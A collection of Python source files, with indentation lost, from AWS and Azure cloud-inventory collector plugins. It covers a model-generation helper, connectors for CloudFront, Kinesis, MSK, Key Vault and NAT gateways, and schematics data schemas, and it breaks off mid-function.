string_re = re.compile(f"{prefix_re}'string'")
choice_string_re = re.compile(f"{prefix_re}(('[\w\d\.\-\_]+'\|?)+)")
def make_list_type(type_name, match):
field = match.group(1)
snake_field = make_snake_name(field)
return f"""\n'{field}':'{snake_field} = ListType({type_name},deserialize_from="{field}")'"""
list_string_re = re.compile(f"{prefix_re}(\[\n\s*(('string')|(('[\w\d\.]+')\|?)+),\n\s*\])")
list_int_re = re.compile(f"{prefix_re}(\[\n\s*123,\n\s*\])")
list_float_re = re.compile(f"{prefix_re}(\[\n\s*123.0,\n\s*\])")
@dataclass
class Model:
raw: str
class_name: str
model_intro_re = re.compile("\s*'(\w+)'\s?:\s?\{")
model_in = re.compile("((\s*\{)|(\s*'(\w+)'\s?:\s?\{))")
model_end = re.compile('\s*\},?\s*')
list_in = re.compile("((\s*\[)|(\s*'(\w+)'\s?:\s?\[))")
list_end = re.compile('\s*\],?\s*')
def make_choice_string_type(match):
field = match.group(1)
snake_field = make_snake_name(field)
raw_choices = match.group(2).split('|')
chocies = ",".join([c.replace("'", '"') for c in raw_choices])
return f"""\n'{field}':'{snake_field} = StringType(deserialize_from="{field}",choices=({chocies}))'"""
def find_model(text):
result = []
models = []
is_in_model = False
model_buffer = []
nested_count = 0
model_name = ''
raw = text.split('\n')
for l in raw:
if is_in_model:
if model_in.match(l):
nested_count += 1
elif (nested_count >= 1) & (model_end.match(l) is not None):
nested_count -= 1
elif model_end.match(l):
model_buffer.append(l)
models.append(Model('\n'.join(model_buffer), model_name))
snake_field = make_snake_name(model_name)
result.append(
f"""'{model_name}':'{snake_field} = ModelType({model_name},deserialize_from="{model_name}")',""")
# reset temp model
is_in_model = False
continue
model_buffer.append(l)
else:
if match := model_intro_re.match(l):
is_in_model = True
model_name = match.group(1)
model_buffer = ['{']
else:
result.append(l)
result = '\n'.join(result)
return result, models
list_model_re = re.compile("'\w+'\s?:\s?\[\n\s*\{\s*(?:\n\s*.*)+?\s*\n\s*\},\s*\n\s*?\]")
list_model_parse_re = re.compile("""'(\w+)'\s?:\s?\[\n\s*(\{\s*(?:\n\s*.*)+\s*\n\s*\}),\s*\n\s*?\]""")
def normalize(class_name, text, _models: list = None):
models = _models or []
result, __models = find_model(text)
models += __models
pre_models = []
for m_text in list_model_re.findall(result):
origin = m_text
match = list_model_parse_re.match(m_text)
field = match.group(1)
_klass_name = class_name + field
snake_field = make_snake_name(field)
_klass, __models = normalize(_klass_name, match.group(2))
pre_models.append(_klass)
models += __models
result = result.replace(origin,
f"""'{field}':'{snake_field} = ListType(ModelType({_klass_name},deserialize_from="{field}"))'""")
pre_models = '\n\n'.join(pre_models)
result = boolean_re.sub(partial(make_simple_type, 'BooleanType'), result)
result = float_re.sub(partial(make_simple_type, 'FloatType'), result)
result = int_re.sub(partial(make_simple_type, 'IntType'), result)
result = string_re.sub(partial(make_simple_type, 'StringType'), result)
result = choice_string_re.sub(make_choice_string_type, result)
result = datetime_re.sub(partial(make_simple_type, 'DateTimeType'), result)
result = list_int_re.sub(partial(make_list_type, 'FloatType'), result)
result = list_int_re.sub(partial(make_list_type, 'IntType'), result)
result = list_string_re.sub(partial(make_list_type, 'StringType'), result)
if result[-1] == ',':
result = result[:-1]
print(result)
parse: dict = eval(result.strip())
fields = '\n '.join([x for x in parse.values()])
klass = f"{pre_models}\n\nclass {class_name}(Model):\n {fields}"
return klass, models
def make_models(models: List[Model]):
result = ''
for model in models:
_klass, _models = normalize(model.class_name, model.raw)
result = f"{result}\n{make_models(_models)}\n{_klass}"
return result
sample_simple = '''
{
'ErrorCode': 123,
'ResponsePagePath': string,
'ResponseCode': string,
'ErrorCachingMinTTL': 123,
'Enabled': True|False,
'Forward': 'none'|'whitelist'|'all',
'AAtACXDest': True|False
}'''
sample_list = '''
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123,
'Enabled': True|False,
'Forward': 'none'|'whitelist'|'all',
'AAtACXDest': True|False,
'Items': [
'string',
],
'NumList': [
123,
],
}'''
sample_nest_model = '''
{
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'Arc': string,
}
'''
sample_list_model = '''
{
'Distribution': {
'ActiveTrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
{
'AwsAccountNumber': 'string',
'KeyPairIds': {
'Quantity': 123,
'Items': [
'string',
]
}
},
]
},
'InProgressInvalidationBatches': 123,
}
}
'''
list_model_in_list_model = '''
{
'NodeGroups': [
{
'NodeGroupId': 'string',
'Status': 'string',
'PrimaryEndpoint': {
'Address': 'string',
'Port': 123
},
'ReaderEndpoint': {
'Address': 'string',
'Port': 123
},
'Slots': 'string',
'NodeGroupMembers': [
{
'CacheClusterId': 'string',
'CacheNodeId': 'string',
'ReadEndpoint': {
'Address': 'string',
'Port': 123
},
'PreferredAvailabilityZone': 'string',
'CurrentRole': 'string'
},
]
},
],
}
'''
first = '''
import logging
from schematics import Model
from schematics.types import ModelType, StringType, IntType, DateTimeType, serializable, ListType, BooleanType
from spaceone.inventory.libs.schema.resource import ReferenceModel
_LOGGER = logging.getLogger(__name__)
'''
last = '''
reference = ModelType(ReferenceModel, serialize_when_none=False)
@serializable
def reference(self):
return {
"resource_id": self.arn,
"external_link": f"https://console.aws.amazon.com/"
}'''
if __name__ == '__main__':
# klass, models = normalize('SampleData', sample_simple)
#
# print(klass)
#
# klass, models = normalize('ListData', sample_list)
# print(klass)
# print('origin')
# print(sample_nest_model)
# klass, models = normalize('ModelData', sample_nest_model)
# print('to class')
# print(f"{make_models(models)}\n\n{klass}")
# print('origin')
# print(sample_list_model)
# klass, models = normalize('ListModelData', sample_list_model)
# print('to class')
# print(f"{make_models(models)}\n\n{klass}")
# print('origin')
# print('NOT SUPPORT LIST>Model>List> Model')
# print(list_model_in_list_model)
# klass, models = normalize('ListModelListModelData', list_model_in_list_model)
# print('to class')
# print(f"{make_models(models)}\n\n{klass}")
data ='''{
'Path': 'string',
'UserName': 'string',
'UserId': 'string',
'Arn': 'string',
'CreateDate': datetime(2015, 1, 1),
'PasswordLastUsed': datetime(2015, 1, 1),
'PermissionsBoundary': {
'PermissionsBoundaryType': 'PermissionsBoundaryPolicy',
'PermissionsBoundaryArn': 'string'
},
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},'''
print('origin')
print(data)
klass, models = normalize('User', data)
print('to class')
print(f"{first}{make_models(models)}{klass}{last}")
```
#### File: connector/aws_cloud_front_connector/connector.py
```python
import time
import logging
from typing import List
from spaceone.inventory.connector.aws_cloud_front_connector.schema.data import DistributionData, Tags
from spaceone.inventory.connector.aws_cloud_front_connector.schema.resource import CloudFrontResponse,\
DistributionResource
from spaceone.inventory.connector.aws_cloud_front_connector.schema.service_type import CLOUD_SERVICE_TYPES
from spaceone.inventory.libs.connector import SchematicAWSConnector
from spaceone.inventory.libs.schema.resource import ReferenceModel, CloudWatchModel
_LOGGER = logging.getLogger(__name__)
class CFConnector(SchematicAWSConnector):
response_schema = CloudFrontResponse
service_name = 'cloudfront'
def get_resources(self):
print("** Cloud Front START **")
resources = []
start_time = time.time()
for cst in CLOUD_SERVICE_TYPES:
resources.append(cst)
try:
for data in self.request_data():
# print(f"[ CloudFront DATA ]")
if getattr(data, 'set_cloudwatch', None):
data.cloudwatch = CloudWatchModel(data.set_cloudwatch())
resources.append(self.response_schema(
{'resource': DistributionResource({'data': data,
'reference': ReferenceModel(data.reference()),
'region_code': 'global'})}))
except Exception as e:
print(f'[ERROR {self.service_name}] {e}')
print(f' Cloud Front Finished {time.time() - start_time} Seconds')
return resources
def request_data(self) -> List[DistributionData]:
paginator = self.client.get_paginator('list_distributions')
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 10000,
'PageSize': 50,
}
)
for data in response_iterator:
for raw in data.get('DistributionList', {}).get('Items', []):
raw.update({
'state_display': self.get_state_display(raw.get('Enabled')),
'account_id': self.account_id,
'tags': list(self.list_tags_for_resource(raw.get('ARN')))
})
res = DistributionData(raw, strict=False)
yield res
def list_tags_for_resource(self, arn):
response = self.client.list_tags_for_resource(Resource=arn)
tags = response.get('Tags', {})
for _tag in tags.get('Items', []):
yield Tags(_tag, strict=False)
@staticmethod
def get_state_display(enabled):
if enabled:
return 'Enabled'
else:
return 'Disabled'
```
#### File: aws_kinesis_data_stream_connector/schema/data.py
```python
import logging
from schematics import Model
from schematics.types import (
ModelType,
StringType,
IntType,
DateTimeType,
ListType,
BooleanType,
)
_LOGGER = logging.getLogger(__name__)
# list_tags_for_stream
class Tags(Model):
key = StringType(deserialize_from="Key")
value = StringType(deserialize_from="Value")
has_more_tags = BooleanType(
deserialize_from="HasMoreTags", serialize_when_none=False
)
# list_stream_consumers
class Consumers(Model):
consumers_num = IntType()
consumer_name = StringType(deserialize_from="ConsumerName")
consumer_arn = StringType(deserialize_from="ConsumerARN")
consumer_status = StringType(
deserialize_from="ConsumerStatus", choices=("CREATING", "DELETING", "ACTIVE")
)
consumer_status_display = StringType(choices=("Creating", "Deleting", "Active"))
consumer_creation_timestamp = DateTimeType(
deserialize_from="ConsumerCreationTimestamp"
)
# describe_stream
class HashKeyRange(Model):
starting_hash_key = StringType(deserialize_from="StartingHashKey")
ending_hash_key = StringType(deserialize_from="EndingHashKey")
class SequenceNumberRange(Model):
starting_sequence_number = StringType(deserialize_from="StartingSequenceNumber")
ending_sequence_number = StringType(deserialize_from="EndingSequenceNumber")
class Shards(Model):
shard_id = StringType(deserialize_from="ShardId")
parent_shard_id = StringType(deserialize_from="ParentShardId")
adjacent_parent_shard_id = StringType(deserialize_from="AdjacentParentShardId")
hash_key_range = ModelType(HashKeyRange, deserialize_from="HashKeyRange")
sequence_number_range = ModelType(
SequenceNumberRange, deserialize_from="SequenceNumberRange"
)
class EnhancedMonitoring(Model):
shard_level_metrics = ListType(
StringType(
choices=(
"IncomingBytes",
"IncomingRecords",
"OutgoingBytes",
"OutgoingRecords",
"WriteProvisionedThroughputExceeded",
"ReadProvisionedThroughputExceeded",
"IteratorAgeMilliseconds",
"ALL",
)
),
deserialize_from="ShardLevelMetrics",
)
class ConsumersVO(Model):
num_of_consumers = IntType()
consumers = ListType(ModelType(Consumers), default=[])
class StreamDescription(Model):
stream_name = StringType(deserialize_from="StreamName")
stream_arn = StringType(deserialize_from="StreamARN")
stream_status = StringType(
deserialize_from="StreamStatus",
choices=("CREATING", "DELETING", "ACTIVE", "UPDATING"),
)
stream_status_display = StringType(
choices=("Creating", "Deleting", "Active", "Updating")
)
shards = ListType(ModelType(Shards), deserialize_from="Shards")
open_shards_num = IntType()
closed_shards_num = IntType()
has_more_shards = BooleanType(deserialize_from="HasMoreShards")
retention_period_hours = IntType(deserialize_from="RetentionPeriodHours")
retention_period_days = IntType()
retention_period_display = StringType()
retention_period_display_hours = StringType()
stream_creation_timestamp = DateTimeType(deserialize_from="StreamCreationTimestamp")
enhanced_monitoring = ListType(
ModelType(EnhancedMonitoring), deserialize_from="EnhancedMonitoring"
)
shard_level_metrics_display = ListType(StringType())
encryption_type = StringType(
deserialize_from="EncryptionType", choices=("NONE", "KMS")
)
encryption_display = StringType(choices=("Disabled", "Enabled"))
key_id = StringType(deserialize_from="KeyId")
consumers_vo = ModelType(ConsumersVO)
tags = ListType(ModelType(Tags), default=[])
def reference(self, region_code):
return {
"resource_id": self.stream_arn,
"external_link": f"https://console.aws.amazon.com/kinesis/home?region={region_code}#/streams/details/{self.stream_name}",
}
```
#### File: aws_msk_connector/schema/data.py
```python
import logging
from schematics import Model
from schematics.types import ModelType, StringType, IntType, FloatType, DateTimeType, ListType, BooleanType
from spaceone.inventory.libs.schema.resource import CloudWatchModel, CloudWatchDimensionModel
_LOGGER = logging.getLogger(__name__)
class Tags(Model):
key = StringType()
value = StringType()
class EbsStorageInfo(Model):
volume_size = IntType(deserialize_from="VolumeSize")
class StateInfo(Model):
ebs_storage_info = ModelType(EbsStorageInfo, deserialize_from="EbsStorageInfo")
class BrokerNodeGroupInfo(Model):
broker_az_distribution = StringType(deserialize_from="BrokerNodeGroupInfo", default="DEFAULT")
client_subnets = ListType(StringType, deserialize_from="ClientSubnets")
instance_type = StringType(deserialize_from="InstanceType")
security_group = ListType(StringType, deserialize_from="SecurityGroups")
storage_info = ModelType(StateInfo, deserialize_from="StorageInfo")
class Scram(Model):
enabled = BooleanType(deserialize_from="Enabled")
class Sasl(Model):
scram = ModelType(Scram, deserialize_from="Sasl")
class Tls(Model):
certificate_authority_arn_list = ListType(StringType, deserialize_from="CertificateAuthorityArnList")
class ClientAuthentication(Model):
sasl = ModelType(Sasl, deserialize_from="Sasl")
tls = ModelType(Tls, deserialize_from="Tls")
class CurrentBrokerSoftwareInfo(Model):
configuration_arn = StringType(deserialize_from="ConfigurationArn")
configuration_revision = IntType(deserialize_from="ConfigurationRevision")
kafka_version = StringType(deserialize_from="KafkaVersion")
class EncryptionInTransit(Model):
client_broker = StringType(deserialize_from="ClientBroker", choices=('TLS','TLS_PLAINTEXT','PLAINTEXT'))
in_cluster = BooleanType(deserialize_from="InCluster")
class EncryptionAtRest(Model):
data_volume_kms_key_id = StringType(deserialize_from="DataVolumeKMSKeyId")
class EncryptionInfo(Model):
encryption_at_rest = ModelType(EncryptionAtRest, deserialize_from="EncryptionAtRest")
encryption_in_transit = ModelType(EncryptionInTransit, deserialize_from="EncryptionInTransit")
class JmxExporter(Model):
enabled_in_broker = BooleanType(deserialize_from="EnabledInBroker")
class NodeExporter(Model):
enabled_in_broker = BooleanType(deserialize_from="EnabledInBroker")
class Prometheus(Model):
jmx_exporter = ModelType(JmxExporter, deserialize_from="EnabledInBroker")
node_exporter = ModelType(NodeExporter, deserialize_from="EnabledInBroker")
class OpenMonitoring(Model):
prometheus = ModelType(Prometheus, deserialize_from="Prometheus")
class CloudWatchLogs(Model):
enabled = BooleanType(deserialize_from="Enabled")
log_group = StringType(deserialize_from="LogGroup")
class BrokerLogs(Model):
cloud_watch_logs = ModelType(CloudWatchLogs, deserialize_from="CloudWatchLogs")
class Firehose(Model):
delivery_stream = StringType(deserialize_from="DeliveryStream")
enabled = BooleanType(deserialize_from="Enabled")
class S3(Model):
bucket = StringType(deserialize_from="Bucket")
enabled = BooleanType(deserialize_from="Enabled")
prefix = StringType(deserialize_from="Prefix")
class LoggingInfo(Model):
broker_logs = ModelType(BrokerLogs, deserialize_from="BrokerLogs")
firehose = ModelType(Firehose, deserialize_from="Firehose")
s3 = ModelType(S3, deserialize_from="S3")
class StateInfo(Model):
code = StringType(deserialize_from="Code")
message = StringType(deserialize_from="Message")
'''
LIST_CLUSTER_OPERATIONS()
'''
class MskCluster(Model):
active_operation_arn = StringType(deserialize_from="ActiveOperationArn")
broker_node_group_info = ModelType(BrokerNodeGroupInfo, deserialize_from="BrokerNodeGroupInfo")
client_authentication = ModelType(ClientAuthentication, deserialize_from="ClientAuthentication")
cluster_arn = StringType(deserialize_from='ClusterArn')
cluster_name = StringType(deserialize_from='ClusterName')
creation_time = DateTimeType(deserialize_from='CreationTime')
current_broker_software_info = ModelType(CurrentBrokerSoftwareInfo, deserialize_from='CurrentBrokerSoftwareInfo')
current_version = StringType(deserialize_from='CurrentVersion')
encryption_info = ModelType(EncryptionInfo, deserialize_from='EncryptionInfo')
enhanced_monitoring = StringType(deserialize_from='EnhancedMonitoring',
choices=('DEFAULT','PER_BROKER','PER_TOPIC_PER_BROKER','PER_TOPIC_PER_PARTITION'))
open_monitoring = ModelType(OpenMonitoring, deserialize_from='OpenMonitoring')
logging_info = ModelType(LoggingInfo, deserialize_from='LoggingInfo')
number_of_broker_nodes = IntType(deserialize_from='NumberOfBrokerNodes')
state = StringType(deserialize_from='State',
choices=('ACTIVE','CREATING','DELETING','FAILED',
'HEALING','MAINTENANCE','REBOOTING_BROKER','UPDATING'))
state_info = ModelType(StateInfo, deserialize_from='StateInfo')
tags = ListType(ModelType(Tags), deserialize_from='Tags', default=[])
zookeeper_connect_string = StringType(deserialize_from='ZookeeperConnectString')
zookeeper_connect_string_tls = StringType(deserialize_from='ZookeeperConnectStringTls')
class BrokerNodeInfo(Model):
attached_eni_id = StringType(deserialize_from='AttachedENIId')
broker_id = FloatType(deserialize_from='BrokerId')
client_subnet = StringType(deserialize_from='ClientSubnet')
client_vpc_ip_address = StringType(deserialize_from='ClientVpcIpAddress')
current_broker_software_info = ModelType(CurrentBrokerSoftwareInfo, deserialize_from='CurrentBrokerSoftwareInfo')
endpoints = ListType(StringType, deserialize_from='Endpoints')
class ZookeeperNodeInfo(Model):
attached_eni_id = StringType(deserialize_from='AttachedENIId')
client_vpc_ip_address = StringType(deserialize_from='ClientVpcIpAddress')
endpoints = ListType(StringType, deserialize_from='Endpoints')
zookeeper_id = FloatType(deserialize_from='ZookeeperId')
zookeeper_version = StringType(deserialize_from='ZookeeperVersion')
class NodeInfo(Model):
added_to_cluster_time = StringType(deserialize_from='AddedToClusterTime')
broker_node_info = ModelType(BrokerNodeInfo, deserialize_from='BrokerNodeInfo')
instance_type = StringType(deserialize_from='InstanceType')
node_arn = StringType(deserialize_from='NodeARN')
node_type = StringType(deserialize_from='NodeType')
zookeeper_node_info = ModelType(ZookeeperNodeInfo, deserialize_from='ZookeeperNodeInfo')
class ClusterInfoList(Model):
cluster_info_list = ListType(ModelType(MskCluster), deserialize_from='ClusterInfoList', default= [])
class LatestRevision(Model):
creation_time = DateTimeType(deserialize_from='CreationTime')
description = StringType(deserialize_from='Description')
revision = IntType(deserialize_from='Revision')
class Configurations(Model):
arn = StringType(deserialize_from='Arn')
creation_time = DateTimeType(deserialize_from='CreationTime')
description = StringType('Description')
kafka_versions = ListType(StringType, deserialize_from='KafkaVersions')
latest_revision = ModelType(LatestRevision, deserialize_from='LatestRevision')
name = StringType(deserialize_from='Name')
state = StringType(deserialize_from='State', choices=('ACTIVE','DELETING','DELETE_FAILED'))
class ListConfigurations(Model):
configurations = ListType(ModelType(Configurations), deserialize_from='Configurations', default=[])
class GetBootStrapBrokers(Model):
bootstrap_broker_string = StringType(deserialize_from='BootstrapBrokerString')
bootstrap_broker_tls = StringType(deserialize_from='BootstrapBrokerStringTls')
bootstrap_broker_string_sasl_scram = StringType(deserialize_from='BootstrapBrokerStringSaslScram')
class ListConfigurationRevisions(Model):
revisions = ListType(ModelType(LatestRevision), deserialize_from='Revisions')
class DescribeConfigurationRevision(Model):
arn = StringType(deserialize_from='Arn')
creation_time = DateTimeType(deserialize_from='CreationTime')
description = StringType(deserialize_from='Description')
revision = IntType(deserialize_from='Revision')
server_properties = ListType(StringType, deserialize_from='ServerProperties')
class ErrorInfo(Model):
error_code = StringType(deserialize_from='ErrorCode')
error_string = StringType(deserialize_from='ErrorString')
class ClusterOperation(Model):
cluster_arn = StringType(deserialize_from='ClusterArn')
creation_time = DateTimeType(deserialize_from='CreationTime')
end_time = DateTimeType(deserialize_from='EndTime')
error_info = ModelType(ErrorInfo, deserialize_from='ErrorInfo')
operation_arn = StringType(deserialize_from='OperationArn')
operation_type = StringType(deserialize_from='OperationType')
class Cluster(Model):
active_operation_arn = StringType(deserialize_from="ActiveOperationArn", serialize_when_none=False)
broker_node_group_info = ModelType(BrokerNodeGroupInfo, deserialize_from="BrokerNodeGroupInfo")
client_authentication = ModelType(ClientAuthentication, deserialize_from="ClientAuthentication")
cluster_arn = StringType(deserialize_from='ClusterArn')
cluster_name = StringType(deserialize_from='ClusterName')
creation_time = DateTimeType(deserialize_from='CreationTime')
current_broker_software_info = ModelType(CurrentBrokerSoftwareInfo, deserialize_from='CurrentBrokerSoftwareInfo')
current_version = StringType(deserialize_from='CurrentVersion')
encryption_info = ModelType(EncryptionInfo, deserialize_from='EncryptionInfo')
enhanced_monitoring = StringType(deserialize_from='EnhancedMonitoring',
choices=(
'DEFAULT', 'PER_BROKER', 'PER_TOPIC_PER_BROKER', 'PER_TOPIC_PER_PARTITION'))
open_monitoring = ModelType(OpenMonitoring, deserialize_from='OpenMonitoring')
logging_info = ModelType(LoggingInfo, deserialize_from='LoggingInfo')
number_of_broker_nodes = IntType(deserialize_from='NumberOfBrokerNodes')
state = StringType(deserialize_from='State',
choices=('ACTIVE', 'CREATING', 'DELETING', 'FAILED',
'HEALING', 'MAINTENANCE', 'REBOOTING_BROKER', 'UPDATING'))
state_info = ModelType(StateInfo, deserialize_from='StateInfo')
tags = ListType(ModelType(Tags), deserialize_from='Tags', default=[])
zookeeper_connect_string = StringType(deserialize_from='ZookeeperConnectString')
zookeeper_connect_string_tls = StringType(deserialize_from='ZookeeperConnectStringTls')
# Broker Node Infomation
node_info_list = ListType(ModelType(NodeInfo), default=[])
# Cluster Operation Info List
cluster_operation_info = ListType(ModelType(ClusterOperation), default=[])
def reference(self, region_code):
return {
"resource_id": self.cluster_arn,
"external_link": f"https://console.aws.amazon.com/msk/home?region={region_code}#/cluster/{self.cluster_arn}/view?tabId=details"
}
class Configuration(Model):
arn = StringType(deserialize_from='Arn')
creation_time = DateTimeType(deserialize_from='CreationTime')
description = StringType(deserialize_from='Description')
kafka_versions = ListType(StringType, deserialize_from='KafkaVersions')
latest_revision = ModelType(LatestRevision, deserialize_from='LatestRevision')
name = StringType(deserialize_from='Name')
state = StringType(deserialize_from='State', choices=('ACTIVE', 'DELETING', 'DELETE_FAILED'))
revisions_configurations = ListType(ModelType(DescribeConfigurationRevision))
def reference(self, region_code):
return {
"resource_id": self.arn,
"external_link": f"https://console.aws.amazon.com/msk/home?region={region_code}#/configuration/{self.arn}/view"
}
```
#### File: connector/aws_workspace_connector/connector.py
```python
import logging
from typing import List
from spaceone.inventory.connector.aws_cloud_front_connector.schema.data import DistributionData
from spaceone.inventory.connector.aws_cloud_front_connector.schema.resource import CloudFrontResponse,DistributionResource
from spaceone.inventory.connector.aws_cloud_front_connector.schema.service_type import CLOUD_SERVICE_TYPES
from spaceone.inventory.libs.connector import SchematicAWSConnector
from spaceone.inventory.libs.schema.resource import ReferenceModel
_LOGGER = logging.getLogger(__name__)
class CFConnector(SchematicAWSConnector):
response_schema = CloudFrontResponse
service_name = 'cloudfront'
def get_resources(self) -> List[DistributionResource]:
resources = []
# init cloud service type
for cst in CLOUD_SERVICE_TYPES:
resources.append(cst)
# merge data
for data in self.request_data():
resources.append(self.response_schema(
{'resource': DistributionResource({'data': data,
'reference': ReferenceModel(data.reference)})}))
return resources
def request_data(self) -> List[DistributionData]:
paginator = self.client.get_paginator('list_distributions')
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 10000,
'PageSize': 50,
}
)
for data in response_iterator:
for raw in data.get('DistributionList', {}).get('Items', []):
res = DistributionData(raw, strict=False)
yield res
```
#### File: inventory/libs/manager.py
```python
from spaceone.core.manager import BaseManager
class AWSManager(BaseManager):
connector_name = None
def verify(self, options, secret_data, **kwargs):
""" Check collector's status.
"""
connector = self.locator.get_connector(self.connector_name, secret_data=secret_data)
connector.verify()
def collect_resources(self, **kwargs) -> list:
return self.locator.get_connector(self.connector_name, **kwargs).collect_data()
```
|
{
"source": "jean1042/plugin-azure-cloud-services",
"score": 2
}
|
#### File: inventory/connector/snapshot.py
```python
import logging
from spaceone.inventory.libs.connector import AzureConnector
from spaceone.inventory.error import *
from spaceone.inventory.error.custom import *
__all__ = ['SnapshotConnector']
_LOGGER = logging.getLogger(__name__)
class SnapshotConnector(AzureConnector):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.set_connect(kwargs.get('secret_data'))
def list_snapshots(self):
try:
return self.compute_client.snapshots.list()
except ConnectionError:
_LOGGER.error(ERROR_CONNECTOR(field='Public IP Address'))
```
#### File: inventory/manager/key_vault_manager.py
```python
from spaceone.inventory.libs.manager import AzureManager
from spaceone.inventory.libs.schema.base import ReferenceModel
from spaceone.inventory.connector.key_vault import KeyVaultConnector
from spaceone.inventory.model.keyvault.cloud_service import *
from spaceone.inventory.model.keyvault.cloud_service_type import CLOUD_SERVICE_TYPES
from spaceone.inventory.model.keyvault.data import *
from spaceone.inventory.error.custom import *
import time
import logging
_LOGGER = logging.getLogger(__name__)
class KeyVaultManager(AzureManager):
connector_name = 'KeyVaultConnector'
cloud_service_types = CLOUD_SERVICE_TYPES
def collect_cloud_service(self, params):
"""
Args:
params (dict):
- 'options' : 'dict'
- 'schema' : 'str'
- 'secret_data' : 'dict'
- 'filter' : 'dict'
- 'zones' : 'list'
- 'subscription_info' : 'dict'
Response:
CloudServiceResponse (dict) : dictionary of azure key vault data resource information
"""
_LOGGER.debug(f'** Key Vault START **')
start_time = time.time()
subscription_info = params['subscription_info']
key_vault_conn: KeyVaultConnector = self.locator.get_connector(self.connector_name, **params)
key_vaults = []
key_vaults_obj_list = key_vault_conn.list_all_key_vaults()
for key_vault in key_vaults_obj_list:
key_vault_dict = self.convert_nested_dictionary(self, key_vault)
key_vault_dict.update({
'resource_group': self.get_resource_group_from_id(key_vault_dict['id']), # parse resource_group from ID
'subscription_id': subscription_info['subscription_id'],
'subscription_name': subscription_info['subscription_name'],
})
resource_group_name = key_vault_dict.get('resource_group', '')
subscription_id = key_vault_dict.get('subscription_id', '')
# Get list of keys, secrets
if key_vault_dict.get('properties', {}).get('vault_uri') is not None:
vault_name = key_vault_dict['name']
vault_uri = key_vault_dict['properties']['vault_uri']
try:
key_vault_dict.update({
'keys': self.list_keys(self, key_vault_conn, resource_group_name, vault_name),
'secrets': self.list_secrets(self, key_vault_conn, subscription_id, vault_uri),
'certificates': self.list_certificates(self, key_vault_conn, subscription_id, vault_uri)
})
except PermissionError:
_LOGGER.error(ERROR_KEY_VAULTS_PERMISSION(field='Key Vaults'))
# Get name of private connection from ID
if key_vault_dict.get('properties', {}).get('private_endpoint_connections') is not None:
key_vault_dict['properties'].update({
'private_endpoint_connections': self.get_private_endpoint_name(key_vault_dict['properties']['private_endpoint_connections'])
})
# Change purge protection to user-friendly word
if key_vault_dict.get('properties', {}).get('enable_purge_protection') is not None:
key_vault_dict['properties'].update({
'enable_purge_protection_str': 'Disabled' if key_vault_dict['properties']['enable_purge_protection'] is False else 'Enabled'
})
_LOGGER.debug(f'[KEY VAULT INFO] {key_vault_dict}')
key_vault_data = KeyVault(key_vault_dict, strict=False)
key_vault_resource = KeyVaultResource({
'data': key_vault_data,
'region_code': key_vault_data.location,
'reference': ReferenceModel(key_vault_data.reference()),
'name': key_vault_data.name
})
# Must set_region_code method for region collection
self.set_region_code(key_vault_data['location'])
key_vaults.append(KeyVaultResponse({'resource': key_vault_resource}))
_LOGGER.debug(f'** Key Vault Finished {time.time() - start_time} Seconds **')
return key_vaults
@staticmethod
def list_keys(self, key_vault_conn, resource_group_name, vault_name):
try:
keys = []
keys_obj_list = key_vault_conn.list_keys(resource_group_name=resource_group_name, vault_name=vault_name)
if keys_obj_list:
for key in keys_obj_list:
key_dict = self.convert_nested_dictionary(self, key)
keys.append(key_dict)
return keys
except ValueError:
_LOGGER.error(ERROR_KEY_VAULTS(field='Key Vaults'))
@staticmethod
def list_secrets(self, key_vault_conn, subscription_id, vault_uri):
try:
key_vault_secret_client = key_vault_conn.init_key_vault_secret_client(subscription_id=subscription_id, vault_uri=vault_uri)
secrets = []
secrets_obj_list = key_vault_secret_client.list_properties_of_secrets()
if secrets_obj_list:
for secret in secrets_obj_list:
secret_dict = self.convert_nested_dictionary(self, secret)
secrets.append(secret_dict)
return secrets
except ValueError:
_LOGGER.error(ERROR_KEY_VAULTS(field='Key Vaults'))
@staticmethod
def list_certificates(self, key_vault_conn, subscription_id, vault_uri):
try:
key_vault_certificate_client = key_vault_conn.init_key_vault_certificate_client(subscription_id=subscription_id, vault_uri=vault_uri)
certificates = []
certificate_obj_list = key_vault_certificate_client.list_properties_of_certificates()
if certificate_obj_list:
for certificate in certificate_obj_list:
secret_dict = self.convert_nested_dictionary(self, certificate)
certificates.append(secret_dict)
return certificates
except ValueError:
_LOGGER.error(ERROR_KEY_VAULTS(field='Key Vaults'))
@staticmethod
def get_private_endpoint_name(private_endpoint_connections):
try:
for private_endpoint in private_endpoint_connections:
private_endpoint.update({
'name': private_endpoint['id'].split('/')[10]
})
return private_endpoint_connections
except ValueError:
_LOGGER.error(ERROR_KEY_VAULTS(field='Private Endpoints'))
```
#### File: inventory/manager/nat_gateway_manager.py
```python
from spaceone.inventory.libs.manager import AzureManager
from spaceone.inventory.libs.schema.base import ReferenceModel
from spaceone.inventory.connector.nat_gateway import NATGatewayConnector
from spaceone.inventory.model.natgateway.cloud_service import *
from spaceone.inventory.model.natgateway.cloud_service_type import CLOUD_SERVICE_TYPES
from spaceone.inventory.model.natgateway.data import *
import time
import ipaddress
import logging
_LOGGER = logging.getLogger(__name__)
class NATGatewayManager(AzureManager):
connector_name = 'NATGatewayConnector'
cloud_service_types = CLOUD_SERVICE_TYPES
def collect_cloud_service(self, params):
"""
Args:
params (dict):
- 'options' : 'dict'
- 'schema' : 'str'
- 'secret_data' : 'dict'
- 'filter' : 'dict'
- 'zones' : 'list'
- 'subscription_info' : 'dict'
Response:
CloudServiceResponse (dict) : dictionary of azure nat gateway data resource information
"""
_LOGGER.debug(f'** NAT Gateway START **')
start_time = time.time()
subscription_info = params['subscription_info']
nat_gateway_conn: NATGatewayConnector = self.locator.get_connector(self.connector_name, **params)
nat_gateways = []
nat_gateways_list = nat_gateway_conn.list_all_nat_gateways()
for nat_gateway in nat_gateways_list:
nat_gateway_dict = self.convert_nested_dictionary(self, nat_gateway)
# update application_gateway_dict
nat_gateway_dict.update({
'resource_group': self.get_resource_group_from_id(nat_gateway_dict['id']),
# parse resource_group from ID
'subscription_id': subscription_info['subscription_id'],
'subscription_name': subscription_info['subscription_name'],
})
if nat_gateway_dict.get('public_ip_addresses') is not None:
# Get Count of Public IP Address
try:
nat_gateway_dict.update({
